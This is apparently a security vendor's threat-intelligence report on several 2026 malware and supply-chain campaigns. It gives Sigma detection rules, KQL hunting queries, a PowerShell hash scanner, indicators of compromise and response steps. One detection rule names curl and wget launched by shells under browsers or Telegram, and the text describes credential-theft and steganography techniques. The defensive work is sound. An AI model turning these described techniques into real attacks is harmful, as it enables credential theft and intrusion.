TwizAdmin, Lazarus Mach-O Man & Supply Chain Attacks: OTX Pulse Analysis — Enterprise Detection Pack | Security Arsenal

Threat Summary

Recent OTX pulses indicate a convergence of high-impact credential theft campaigns, supply chain poisoning, and state-sponsored espionage. The landscape is dominated by the DataBreachPlus group deploying the TwizAdmin infostealer and crpx0 ransomware, alongside Lazarus Group utilizing the Mach-O Man malware kit specifically targeting macOS users in the financial sector via Telegram "ClickFix" lures. Simultaneously, a TeamPCP supply chain attack on the official Checkmarx KICS Docker images demonstrates a shift towards compromising trusted developer tooling to harvest infrastructure-as-code credentials. Finally, FrostyNeighbor continues its cyberespionage operations in Eastern Europe using PicassoLoader and Cobalt Strike.

Collectively, these campaigns highlight a pivot towards platform-agnostic payloads (Windows and macOS) and the abuse of trusted delivery mechanisms (Docker Hub, VS Code Marketplace, Telegram) to bypass standard defenses and harvest sensitive credentials, crypto-wallets, and infrastructure secrets.

Threat Actor / Malware Profile

1. TwizAdmin (DataBreachPlus)

Distribution: FedEx-themed phishing lures and multi-platform installers.
Payload Behavior: A complex operation featuring a clipboard hijacker supporting 8 cryptocurrency chains, BIP-39 seed phrase theft, and browser credential dumping.
C2 Communication: Managed via a FastAPI-based panel (port 1337) requiring license keys.
Persistence: Utilizes a Java RAT builder for remote access and maintenance.
Anti-Analysis: Uses license key verification to prevent unauthorized access to the panel and payloads.

2. Mach-O Man (Lazarus Group)

Distribution: "ClickFix" social engineering via Telegram. Fake meeting invites redirect to typosquatted domains (e.g., livemicrosft.com) impersonating Zoom/Teams.
Payload Behavior: Python-based malware (PyLangGhostRAT) targeting macOS. It steals browser data and exfiltrates via Telegram.
C2 Communication: Uses Telegram API for C2, making network detection difficult.
Persistence: Gains initial access through manual terminal command execution by the victim.

3. KICS Docker Compromise (TeamPCP)

Distribution: Poisoned Docker Hub images (v2.1.20, v2.1.21, alpine) and VS Code extensions.
Payload Behavior: The mcpAddon.js script trojanizes the KICS binary, encrypting and exfiltrating scan reports containing credentials.
Persistence: Embedded within the CI/CD pipeline tools used by developers.

4. PureLogs / PawsRunner

Distribution: Phishing emails with TXZ archives containing invoice lures.
Payload Behavior: .NET infostealer concealed within PNG files using steganography. PawsRunner decrypts the payload in memory.
Persistence: PowerShell execution via environment variable obfuscation.

IOC Analysis

The provided IOCs span multiple categories requiring different operational postures:

File Hashes (SHA256/MD5/SHA1): A significant volume of hashes (TwizAdmin, Mach-O Man, KICS) are provided. These should be imported into EDR solutions immediately for quarantine/remediation.
Domains (Typosquatting & C2): Indicators like livemicrosft.com (Lazarus) and fanonlyatn.xyz (TwizAdmin) represent phishing infrastructure and C2. These should be blocked at the DNS layer.
Network Infrastructure: FrostyNeighbor utilizes randomized subdomains on .icu TLDs (e.g., alexavegas.icu), suggesting the use of Domain Generation Algorithms (DGAs) or fast-flux infrastructure, requiring DNS analytics for detection rather than simple blocking.

Detection Engineering

YAML

title: Suspicious PowerShell PNG Access (PureLogs PawsRunner)
id: 3c7b6f8a-1d9e-4f5a-b2c3-0e9f8a7b6c5d
description: Detects PowerShell accessing PNG files in a manner consistent with steganography payload extraction, as seen in PureLogs campaigns.
status: experimental
date: 2026/05/24
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427349f8a1b4c9f8d7e6f5a
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - '.png'
            - 'System.Drawing.Bitmap'
            - 'System.IO.MemoryStream'
    condition: selection
falsepositives:
    - Legitimate image processing scripts
level: high
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
---
title: macOS Fake Collaboration Tool Execution (Mach-O Man)
id: 9d8e7f6a-5b4c-4a3d-9e1f-2c3b4a5d6e7f
description: Detects macOS terminal commands spawned by communication apps or browsers, indicative of Lazarus Group Mach-O Man ClickFix attacks.
status: experimental
date: 2026/05/24
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427349f8a1b4c9f8d7e6f5b
logsource:
    product: macos
    category: process_creation
detection:
    selection_parent:
        Image|contains:
            - 'Telegram'
            - 'Chrome'
            - 'Firefox'
            - 'Safari'
    selection_child:
        Image|endswith:
            - '/bin/sh'
            - '/bin/bash'
            - '/bin/zsh'
            - '/usr/bin/osascript'
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'cd /tmp'
    condition: all of selection_*
falsepositives:
    - Administrative troubleshooting via terminal
level: critical
tags:
    - attack.initial_access
    - attack.t1189
    - attack.execution
---
title: TwizAdmin C2 Network Activity
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects network connections to known TwizAdmin C2 infrastructure or FastAPI panels on non-standard ports.
status: experimental
date: 2026/05/24
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427349f8a1b4c9f8d7e6f5a
logsource:
    category: network_connection
detection:
    selection_ip:
        DestinationIp|contains:
            - '103.241.66.238'
    selection_domain:
        DestinationDomain|contains:
            - 'fanonlyatn.xyz'
    selection_port:
        DestinationPort:
            - 1337
    condition: 1 of selection_
falsepositives:
    - Low
level: high
tags:
    - attack.c2
    - attack.t1071


kql// Hunt for FrostyNeighbor Domains (FrostyNeighbor Pulse)
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_suffix (".icu") 
| where RemoteUrl has_any ("alexavegas", "needbinding", "algsat")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP

// Hunt for PureLogs/PawsRunner Execution (PureLogs Pulse)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "powershell.exe"
| where ProcessCommandLine has ".png" and (ProcessCommandLine has "FromBase64String" or ProcessCommandLine has "MemoryStream")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessParentFileName


powershell# IOC Hunt Script for TwizAdmin and Mach-O Man Hashes
# Requires administrative privileges

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", # TwizAdmin
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", # TwizAdmin
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527", # TwizAdmin
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90", # Mach-O Man
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9"  # Mach-O Man
)

$DrivesToScan = @("C:\", "D:\")
$MatchesFound = @()

Write-Host "[+] Starting hunt for known TwizAdmin and Mach-O Man hashes..." -ForegroundColor Cyan

foreach ($Drive in $DrivesToScan) {
    if (Test-Path $Drive) {
        Write-Host "[+] Scanning $Drive..." -ForegroundColor Yellow
        try {
            $Files = Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue -File
            foreach ($File in $Files) {
                $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
                if ($Hash -in $TargetHashes) {
                    $MatchesFound += [PSCustomObject]@{
                        FilePath = $File.FullName
                        Hash     = $Hash
                        Detected = (Get-Date)
                    }
                }
            }
        } catch {
            Write-Host "[-] Error accessing $Drive" -ForegroundColor Red
        }
    }
}

if ($MatchesFound.Count -gt 0) {
    Write-Host "[!] THREAT DETECTED: Found $($MatchesFound.Count) matching files." -ForegroundColor Red
    $MatchesFound | Format-Table -AutoSize
} else {
    Write-Host "[+] No matching files found." -ForegroundColor Green
}

Response Priorities

Immediate (0-4h):
- Block all domains and IOCs associated with TwizAdmin (fanonlyatn.xyz) and Lazarus (livemicrosft.com).
- Quarantine any devices matching the provided file hashes.
- Identify and pull all Checkmarx KICS Docker images (tags v2.1.20, v2.1.21, alpine) and VS Code extensions (v1.17.0, v1.19.0) immediately; re-scan infrastructure for exposed credentials.
24 Hours:
- Initiate credential resets for accounts accessed from devices potentially infected by TwizAdmin or Mach-O Man (focusing on crypto wallets and banking/finance credentials).
- Review network logs for connections to the .icu domains linked to FrostyNeighbor.
1 Week:
- Architecture Hardening: Implement strict allow-listing for Docker images and enforce SBOM (Software Bill of Materials) scanning for all CI/CD pipelines to prevent supply chain ingestion.
- Awareness: Update security awareness training to include "ClickFix" macOS attacks and the dangers of executing terminal commands prompted by collaboration apps.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

TwizAdmin, Lazarus Mach-O Man & Supply Chain Attacks: OTX Pulse Analysis — Enterprise Detection Pack